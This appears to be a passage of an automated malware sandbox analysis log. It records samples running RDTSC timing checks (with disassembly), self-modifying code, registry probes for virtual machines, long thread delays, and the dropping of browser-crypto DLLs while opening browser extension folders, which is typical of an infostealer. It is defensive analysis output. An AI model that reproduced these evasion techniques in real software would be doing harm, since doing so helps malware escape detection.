Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B04F7 second address: 52B054F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FEEF6AF713Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007FEE84E88FCFh 0x0000001a adc si, 478Eh 0x0000001f jmp 00007FEE84E88FD9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A089F second address: 52A093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FEE851EFD8Eh 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FEE851EFD90h 0x00000012 mov ebp, esp 0x00000014 jmp 00007FEE851EFD90h 0x00000019 and esp, FFFFFFF8h 0x0000001c jmp 00007FEE851EFD90h 0x00000021 xchg eax, ebx 0x00000022 jmp 00007FEE851EFD90h 0x00000027 push eax 0x00000028 pushad 0x00000029 call 00007FEE851EFD91h 0x0000002e mov ch, 17h 0x00000030 pop ebx 0x00000031 mov bh, ch 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 jmp 00007FEE851EFD95h 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FEE851EFD8Dh 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A093A second address: 52A0940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0940 second address: 52A094F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A094F second address: 52A0953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0953 second address: 52A096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A096E second address: 52A0A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c push ebx 0x0000000d pushfd 0x0000000e jmp 00007FEE84E88FD6h 0x00000013 and cx, E038h 0x00000018 jmp 00007FEE84E88FCBh 0x0000001d popfd 0x0000001e pop esi 0x0000001f call 00007FEE84E88FD9h 0x00000024 mov cx, 5557h 0x00000028 pop esi 0x00000029 popad 0x0000002a mov esi, dword ptr [ebp+08h] 0x0000002d jmp 00007FEE84E88FD3h 0x00000032 sub ebx, ebx 0x00000034 pushad 0x00000035 movsx ebx, ax 0x00000038 mov bh, cl 0x0000003a popad 0x0000003b test esi, esi 0x0000003d jmp 00007FEE84E88FD9h 0x00000042 je 00007FEEF6AFE957h 0x00000048 jmp 00007FEE84E88FCEh 0x0000004d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0A1E second address: 52A0A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0A22 second address: 52A0A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0A28 second address: 52A0A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, C391h 0x00000007 pushfd 0x00000008 jmp 00007FEE851EFD8Eh 0x0000000d or cx, 30E8h 0x00000012 jmp 00007FEE851EFD8Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ecx, esi 0x0000001d jmp 00007FEE851EFD96h 0x00000022 je 00007FEEF6E656BFh 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b mov ebx, eax 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0A75 second address: 52A0AA3 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, 0CD183DBh 0x0000000c popad 0x0000000d test byte ptr [76FA6968h], 00000002h 0x00000014 jmp 00007FEE84E88FCEh 0x00000019 jne 00007FEEF6AFE8E5h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0AA3 second address: 52A0AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0AA7 second address: 52A0AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0AC4 second address: 52A0B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 call 00007FEE851EFD98h 0x00000015 mov bx, si 0x00000018 pop esi 0x00000019 popad 0x0000001a push edx 0x0000001b jmp 00007FEE851EFD8Ah 0x00000020 mov dword ptr [esp], ebx 0x00000023 jmp 00007FEE851EFD90h 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a mov di, cx 0x0000002d jmp 00007FEE851EFD8Ah 0x00000032 popad 0x00000033 push eax 0x00000034 jmp 00007FEE851EFD8Bh 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b mov cx, 8B3Bh 0x0000003f pushfd 0x00000040 jmp 00007FEE851EFD90h 0x00000045 jmp 00007FEE851EFD95h 0x0000004a popfd 0x0000004b popad 0x0000004c push dword ptr [ebp+14h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FEE851EFD98h 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0B84 second address: 52A0B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0B88 second address: 52A0B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0B8E second address: 52A0B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FCDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0B9F second address: 52A0BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0BC6 second address: 52A0BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0BCA second address: 52A0BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0BD0 second address: 52A0C38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushfd 0x00000007 jmp 00007FEE84E88FCDh 0x0000000c add ecx, 38721216h 0x00000012 jmp 00007FEE84E88FD1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop esi 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FEE84E88FCCh 0x00000023 sub ecx, 7B380638h 0x00000029 jmp 00007FEE84E88FCBh 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FEE84E88FD6h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0C38 second address: 52A0C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0C3C second address: 52A0C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d mov cx, di 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FECC2 second address: 8FECCC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FECCC second address: 8FECD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FEE84E88FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FF08C second address: 8FF092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0044 second address: 52C004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C004A second address: 52C0083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FEE851EFD8Ah 0x0000000b adc ax, 2048h 0x00000010 jmp 00007FEE851EFD8Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FEE851EFD90h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0083 second address: 52C0089 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D3D second address: 52B0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D43 second address: 52B0D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D47 second address: 52B0D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D4B second address: 52B0D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007FEE84E88FCBh 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D6A second address: 52B0D85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D85 second address: 52B0D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D8B second address: 52B0DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEE851EFD95h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320F79 second address: 5320FBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FEE84E88FD6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FEE84E88FD7h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320FBC second address: 5320FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320FC2 second address: 5320FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53203F9 second address: 53203FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53203FF second address: 5320410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FCDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320410 second address: 5320438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEE851EFD8Dh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320271 second address: 5320282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320282 second address: 5320286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320286 second address: 532028C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 532028C second address: 53202A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEE851EFD8Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ax, 92F9h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53202A8 second address: 53202CD instructions: 0x00000000 rdtsc 0x00000002 mov al, 65h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, ebx 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE84E88FD8h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C037E second address: 52C0397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FEE851EFD93h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 532069C second address: 53206EB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FEE84E88FCBh 0x0000000c jmp 00007FEE84E88FD3h 0x00000011 popfd 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FEE84E88FD6h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FEE84E88FCEh 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53206EB second address: 5320717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FEE851EFD8Ah 0x0000000c sbb ax, 50E8h 0x00000011 jmp 00007FEE851EFD8Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320717 second address: 532071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 532071B second address: 532071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Special instruction interceptor: First address: 73EBB1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Special instruction interceptor: First address: 8F3280 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Special instruction interceptor: First address: 906AC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Special instruction interceptor: First address: 97E462 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 50EBB1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 6C3280 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 6D6AC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 74E462 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Code function: 6_2_05320823 rdtsc 6_2_05320823
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Window / User API: threadDelayed 1359
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2147
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3333
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Window / User API: threadDelayed 779
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe API coverage: 0.8 %
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe API coverage: 0.0 %
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe TID: 4128 Thread sleep count: 1359 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2072 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2072 Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5792 Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5792 Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3292 Thread sleep count: 314 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3292 Thread sleep time: -9420000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2292 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3292 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe TID: 5616 Thread sleep count: 779 > 30
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe TID: 5616 Thread sleep count: 40 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C32C930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
